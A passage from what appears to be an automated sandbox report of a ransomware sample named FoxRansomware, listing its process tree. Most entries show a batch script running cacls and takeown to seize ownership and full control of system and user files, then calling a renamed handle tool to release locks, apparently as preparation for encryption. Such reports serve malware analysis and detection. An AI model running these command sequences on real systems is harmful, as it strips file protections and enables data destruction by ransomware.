  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2""
  2⤵
  PID:3460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2" /E /G Admin:F /C
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG2"
    3⤵
    PID:672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "settings.dat.LOG2" -nobanner
    3⤵
    PID:5796
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "settings.dat.LOG2" -nobanner
      4⤵
      PID:2536
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6812
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:5488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    PID:7036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:6120
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:6380
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.3fa85ede-6ae1-4fa1-8fbf-901b58253916.1.etl""
  2⤵
  PID:6796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.3fa85ede-6ae1-4fa1-8fbf-901b58253916.1.etl" /E /G Admin:F /C
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.3fa85ede-6ae1-4fa1-8fbf-901b58253916.1.etl"
    3⤵
    PID:6492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MoUsoCoreWorker.3fa85ede-6ae1-4fa1-8fbf-901b58253916.1.etl" -nobanner
    3⤵
    PID:3592
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MoUsoCoreWorker.3fa85ede-6ae1-4fa1-8fbf-901b58253916.1.etl" -nobanner
      4⤵
      PID:6680
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.c4085d57-684e-4c90-a017-5b6969fb25dd.1.etl""
  2⤵
  PID:1112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.c4085d57-684e-4c90-a017-5b6969fb25dd.1.etl" /E /G Admin:F /C
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.c4085d57-684e-4c90-a017-5b6969fb25dd.1.etl"
    3⤵
    - Modifies file permissions
    PID:6336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "WuProvider.c4085d57-684e-4c90-a017-5b6969fb25dd.1.etl" -nobanner
    3⤵
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "WuProvider.c4085d57-684e-4c90-a017-5b6969fb25dd.1.etl" -nobanner
      4⤵
      PID:6000
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:5160
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:5388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    PID:6176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:6388
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:6684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:7164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:7056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "device.png" -nobanner
    3⤵
    PID:6968
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "device.png" -nobanner
      4⤵
      PID:5420
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:6572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5096
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:5332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:6188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    PID:5368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5720
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5844
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm""
  2⤵
  PID:6540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm" /E /G Admin:F /C
    3⤵
    PID:6472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\L.Admin\ActivitiesCache.db-shm"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "ActivitiesCache.db-shm" -nobanner
    3⤵
    PID:5616
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "ActivitiesCache.db-shm" -nobanner
      4⤵
      PID:6568
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4204
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:5716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:6300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Modifies file permissions
    PID:5612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:5604
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      PID:4444
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:3376
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      PID:6272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    - Modifies file permissions
    PID:4472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:6856
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      PID:2904
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl""
  2⤵
  PID:2896
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl" /E /G Admin:F /C
    3⤵
    PID:6628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl"
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl" -nobanner
    3⤵
    PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "WuProvider.06923e35-f1e9-43d6-ab8b-6e815d579640.1.etl" -nobanner
      4⤵
      PID:2740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""
  2⤵
  PID:6748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C
    3⤵
    PID:6420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"
    3⤵
    PID:6096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000G.bin" -nobanner
    3⤵
    PID:4240
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000G.bin" -nobanner
      4⤵
      PID:5184
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""
  2⤵
  PID:6448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C
    3⤵
    PID:300
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"
    3⤵
    - Modifies file permissions
    PID:6620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000000R.bin" -nobanner
    3⤵
    PID:6508
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000000R.bin" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""
  2⤵
  PID:3036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"
    3⤵
    PID:7112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000015.bin" -nobanner
    3⤵
    PID:5276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000015.bin" -nobanner
      4⤵
      PID:6892
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""
  2⤵
  PID:5944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C
    3⤵
    PID:5796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"
    3⤵
    PID:6644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000006H.bin" -nobanner
    3⤵
    PID:4532
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000006H.bin" -nobanner
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""
  2⤵
  PID:7036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C
    3⤵
    PID:6120
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"
    3⤵
    PID:3624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000075.bin" -nobanner
    3⤵
    PID:3700
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000075.bin" -nobanner
      4⤵
      PID:5488
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5344
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin""
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin" /E /G Admin:F /C
    3⤵
    PID:5880
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin"
    3⤵
    PID:4416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "00000083.bin" -nobanner
    3⤵
    PID:7028
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "00000083.bin" -nobanner
      4⤵
      PID:6912
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""
  2⤵
  PID:7096
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C
    3⤵
    PID:5712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"
    3⤵
    - Modifies file permissions
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "0000009F.bin" -nobanner
    3⤵
    PID:7072
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "0000009F.bin" -nobanner
      4⤵
      PID:6140
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:7084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""
  2⤵
  PID:6176
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C
    3⤵
    PID:6872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000AL.bin" -nobanner
    3⤵
    PID:5580
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000AL.bin" -nobanner
      4⤵
      PID:4348
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""
  2⤵
  PID:5128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "000000B1.bin" -nobanner
    3⤵
    PID:6836
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "000000B1.bin" -nobanner
      4⤵
      PID:5132
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:820
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "background.png" -nobanner
    3⤵
    PID:5644
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
      3xoBcHMg.exe -accepteula "background.png" -nobanner
      4⤵
      PID:6788
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3xoBcHMg.exe
    3xoBcHMg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Y6D2NYuf.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:5368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3xoBcHMg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5872
